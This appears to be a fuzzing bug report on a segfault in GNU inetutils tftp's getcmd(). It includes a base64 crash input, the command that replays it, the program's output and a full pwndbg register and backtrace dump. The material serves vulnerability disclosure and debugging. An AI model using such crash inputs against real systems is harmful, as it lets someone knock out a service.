# Untrusted Pointer Dereference in getcmd() at inetutils/src/tftp.c:878

## Description
An Untrusted Pointer Dereference was discovered in getcmd() at inetutils/src/tftp.c:878: the `name` pointer handed to getcmd() is not a valid address (gdb shows `name=0x555500000033 <error: Cannot access memory ...>`), and dereferencing it causes a segmentation fault (SIGSEGV) that crashes the tftp program. The backtrace below shows help() entered with `argv=0x555555567b50 <margc>`, i.e. the argument vector pointer appears to point at the integer margc rather than at margv, which would explain why the value read as `name` is not a string pointer — this should be confirmed against the source of the calling code.

**version**

```
./tftp --version
tftp (GNU inetutils) 2.2.16-cf091
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Written by many authors.
```

**System information**

Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

## Proof of Concept

**poc**

```
base64 poc
PyA/IGIg/zc/IGIgEMoiICIgEAsgYiDKysogIiAQNyIiIyIgIiAQCyA/IGIgNwQgIP83IyIgIiAQ
CyA6uwQvHiIUYiDKysrKPyA/IGIgEMoiICIgEDciIiMiICIgEAsgPyBiIDcEICD/NyMiICIgEAsg
OrsELx4iFGIgysrKyj8gPyBiIBDKIiAiIBALIGIgysrKICIpEDciICIgEAsgYiDKysogIiAQNyIi
IABAMAsg
```

**command:**

```
./tftp < ./poc
```

**Result**

```
./tftp < poc print help information set mode to octet ?Invalid help command �7? set mode to octet ?Invalid help command �" ?Invalid help command " ?Invalid help command set mode to octet ?Invalid help command ��� ?Invalid help command " ?Invalid help command 7""#" ?Invalid help command " ?Invalid help command print help information set mode to octet ?Invalid help command 7 ?Invalid help command �7#" ?Invalid help command " ?Invalid help command ?Invalid help command :� / " b ?Invalid help command ����? print help information set mode to octet ?Invalid help command �" ?Invalid help command " ?Invalid help command 7""#" ?Invalid help command " ?Invalid help command print help information set mode to octet ?Invalid help command 7 ?Invalid help command �7#" ?Invalid help command " ?Invalid help command ?Invalid help command :� / " b ?Invalid help command ����? 
print help information set mode to octet ?Invalid help command �" ?Invalid help command " ?Invalid help command set mode to octet ?Invalid help command ��� ?Invalid help command ") 7" ?Invalid help command " ?Invalid help command set mode to octet ?Invalid help command ��� ?Invalid help command " [1] 1736392 segmentation fault ./tftp < poc ``` **gdb** ``` Program received signal SIGSEGV, Segmentation fault. 0x0000555555558bc4 in getcmd (name=0x555500000033 <error: Cannot access memory at address 0x555500000033>) at tftp.c:878 878 for (c = cmdtab; (p = c->name) != NULL; c++) LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x18 RBX 0x555555567b50 (margc) ◂— 0x555500000033 /* '3' */ RCX 0x0 RDX 0x0 RDI 0x555500000033 RSI 0x55555556258c ◂— 0x7463656e6e6f63 /* 'connect' */ R8 0x0 R9 0x18 R10 0x55555556243b ◂— 0x203a70746674000a /* '\n' */ R11 0x246 R12 0x555500000033 R13 0x555555562423 ◂— '?Invalid help command %s\n' R14 0x0 R15 0x0 RBP 0x555555567b50 (margc) ◂— 0x555500000033 /* '3' */ RSP 0x7fffffffe138 —▸ 0x555555558cce (help+78) ◂— cmp rax, -1 RIP 0x555555558bc4 (getcmd+20) ◂— movzx r9d, byte ptr [rdi] ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── ► 0x555555558bc4 <getcmd+20> movzx r9d, byte ptr [rdi] 0x555555558bc8 <getcmd+24> push rbx 0x555555558bc9 <getcmd+25> xor r11d, r11d 0x555555558bcc <getcmd+28> xor r10d, r10d 0x555555558bcf <getcmd+31> xor ebx, ebx 0x555555558bd1 <getcmd+33> lea r8, [rip + 0xe7c8] <0x5555555673a0> 0x555555558bd8 <getcmd+40> lea rcx, [rsi + 1] 0x555555558bdc <getcmd+44> mov rdx, rdi 0x555555558bdf <getcmd+47> mov eax, r9d 0x555555558be2 <getcmd+50> cmp byte ptr [rsi], r9b 0x555555558be5 <getcmd+53> je getcmd+80 <getcmd+80> ──────────────────────────────────────────[ SOURCE (CODE) ]─────────────────────────────────────────── In file: 
/home/aidai/fuzzing/inetutils/inetutils/src/tftp.c 873 register int nmatches, longest; 874 875 longest = 0; 876 nmatches = 0; 877 found = 0; ► 878 for (c = cmdtab; (p = c->name) != NULL; c++) 879 { 880 for (q = name; *q == *p++; q++) 881 if (*q == 0) /* exact match? */ 882 return (c); 883 ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffffe138 —▸ 0x555555558cce (help+78) ◂— cmp rax, -1 01:0008│ 0x7fffffffe140 —▸ 0x55555556b710 ◂— 0x0 02:0010│ 0x7fffffffe148 —▸ 0x5555555610f0 (__libc_csu_init) ◂— endbr64 03:0018│ 0x7fffffffe150 ◂— 0x33 /* '3' */ 04:0020│ 0x7fffffffe158 —▸ 0x5555555679c0 (margv) —▸ 0x555555567b80 (line) ◂— 0x37ff0062003f003f /* '?' */ 05:0028│ 0x7fffffffe160 —▸ 0x7fffffffe270 ◂— 0x1 06:0030│ 0x7fffffffe168 —▸ 0x555555557b83 (main+387) ◂— jmp 0x555555557b29 07:0038│ 0x7fffffffe170 —▸ 0x7fffffffe270 ◂— 0x1 ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x555555558bc4 getcmd+20 f 1 0x555555558cce help+78 f 2 0x555555557b83 main+387 f 3 0x555555557b83 main+387 f 4 0x7ffff7de70b3 __libc_start_main+243 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 0x0000555555558bc4 in getcmd (name=0x555500000033 <error: Cannot access memory at address 0x555500000033>) at tftp.c:878 #1 0x0000555555558cce in help (argc=<optimized out>, argv=0x555555567b50 <margc>) at tftp.c:955 #2 0x0000555555557b83 in command () at tftp.c:864 #3 main (argc=argc@entry=1, argv=argv@entry=0x7fffffffe278) at tftp.c:298 #4 0x00007ffff7de70b3 in __libc_start_main (main=0x555555557a00 <main>, argc=1, argv=0x7fffffffe278, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe268) at ../csu/libc-start.c:308 #5 0x0000555555557c0e in _start () at /usr/include/x86_64-linux-gnu/bits/stdio2.h:107 ```